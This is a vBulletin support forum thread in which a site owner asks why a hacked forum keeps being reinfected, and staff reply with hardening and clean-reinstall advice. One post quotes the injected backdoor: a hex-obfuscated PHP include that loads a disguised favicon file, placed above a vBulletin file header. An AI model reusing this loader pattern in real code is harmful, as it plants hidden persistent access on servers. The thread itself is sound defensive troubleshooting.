Error log

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 73981

    #16
    Originally posted by mittac
    all done, did not help - still hack the site. how to determine how they get on the server?
    Unless you have comprehensive access logs and detection security, it is almost always a waste of time to try and determine how someone is gaining access to a web server. If they have a vague clue about what they are doing, they will cover their tracks.
    1. Lock down your site. Only use SFTP, SMTP, and SSH to connect to the server remotely. FTP, POP3, IMAP, and Telnet should be disabled. cPanel should only be accessed via HTTPS.
    2. Make sure the server is up to date with all software - OS, Web Server, PHP, MySQL/MariaDB, etc...
    3. Change passwords and make sure they are long and secure.
    4. Use the tools in vBulletin 5 to lock down your AdminCP and ModCP. You can restrict access via IP address in /core/includes/config.php. You can also enable Two-Factor Authentication.
    5. Update all your passwords and make sure that each service uses a unique password (SFTP, MySQL, SMTP, SSH, cPanel, etc...)
    6. Make sure vBulletin is up to date.
    7. Make sure all included .htaccess files are in place. We use these to prevent access to sensitive areas.
    8. Talk to your host to see if you can CHMOD the files to 0644. That will prevent other users on the server from accessing them.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API

    Comment

    • mittac
      Member
      • Feb 2014
      • 93
      • 5.0.X

      #17
      Originally posted by Wayne Luke

      Unless you have comprehensive access logs and detection security, it is almost always a waste of time to try and determine how someone is gaining access to a web server. If they have a vague clue about what they are doing, they will cover their tracks.
      1. Lock down your site. Only use SFTP, SMTP, and SSH to connect to the server remotely. FTP, POP3, IMAP, and Telnet should be disabled. cPanel should only be accessed via HTTPS.
      2. Make sure the server is up to date with all software - OS, Web Server, PHP, MySQL/MariaDB, etc...
      3. Change passwords and make sure they are long and secure.
      4. Use the tools in vBulletin 5 to lock down your AdminCP and ModCP. You can restrict access via IP address in /core/includes/config.php. You can also enable Two-Factor Authentication.
      5. Update all your passwords and make sure that each service uses a unique password (SFTP, MySQL, SMTP, SSH, cPanel, etc...)
      6. Make sure vBulletin is up to date.
      7. Make sure all included .htaccess files are in place. We use these to prevent access to sensitive areas.
      8. Talk to your host to see if you can CHMOD the files to 0644. That will prevent other users on the server from accessing them.
      all this did, changed all passwords, changed permissions. all the same writes in files an index here such here the code. how to determine how this works?

      <?php
      /*fa1da*/

      @include "\x2fh\x6fm\x65/\x61t\x76c\x6cu\x62b\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fc\x6fr\x65/\x63p\x73t\x79l\x65s\x2fv\x42u\x6cl\x65t\x69n\x5f5\x5fD\x65f\x61u\x6ct\x2ff\x61v\x69c\x6fn \x5f7\x39c\x611\x39.\x69c\x6f";

      /*fa1da*/
      /*========================================================================*\
      || ###################################################################### ||
      || # vBulletin 5.3.3 - Licence Number LC411C201D
      || # ------------------------------------------------------------------ # ||
      || # Copyright 2000-2017 vBulletin Solutions Inc. All Rights Reserved. # ||
      || # This file may not be redistributed in whole or significant part. # ||
      || # ----------------- VBULLETIN IS NOT FREE SOFTWARE ----------------- # ||
      || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
      || ###################################################################### ||
      \*========================================================================*/

      // ######################## SET PHP ENVIRONMENT ###########################

      Comment

      • Wayne Luke
        vBulletin Technical Support Lead
        • Aug 2000
        • 73981

        #18
        This is the file they are including - /home/atvclubb/public_html/core/cpstyles/vBulletin_5_Default/favicon%20_79ca19.ico

        That is not a vBulletin file. You need to make sure that every file on your server is one that you put there.

        I suggest...
        1. Backing up the /config.php and /core/includes/config.php
        2. Backup any custom style images images you have.
        3. Moving attachments to the database in the AdminCP. (Attachments -> Attachment Storage Type)
        4. Moving avatars into the database (Avatars -> User Picture Storage Type)
        5. Moving CSS into the database (Settings -> Options -> Style and Language Options)
        6. Deleting every single file in your vBulletin directory.
        7. Changing your vBulletin passwords (they should be considered compromised)
        8. Replace them with a new copy of files downloaded from this site.
        9. Move the above items back to the file system.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API

        Comment

        • mittac
          Member
          • Feb 2014
          • 93
          • 5.0.X

          #19
          I write down new files, and a day later they appear in this record. changed access rights 0644 to these files - does not help. how to determine which script is making this entry?

          Comment

          • mittac
            Member
            • Feb 2014
            • 93
            • 5.0.X

            #20
            I delete these files, and a day later they appear elsewhere

            Comment

            • Wayne Luke
              vBulletin Technical Support Lead
              • Aug 2000
              • 73981

              #21
              Originally posted by mittac
              I delete these files, and a day later they appear elsewhere
              Then someone has access to your server. I would find a new server company.
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API

              Comment

              Related Topics

              Collapse

              Working...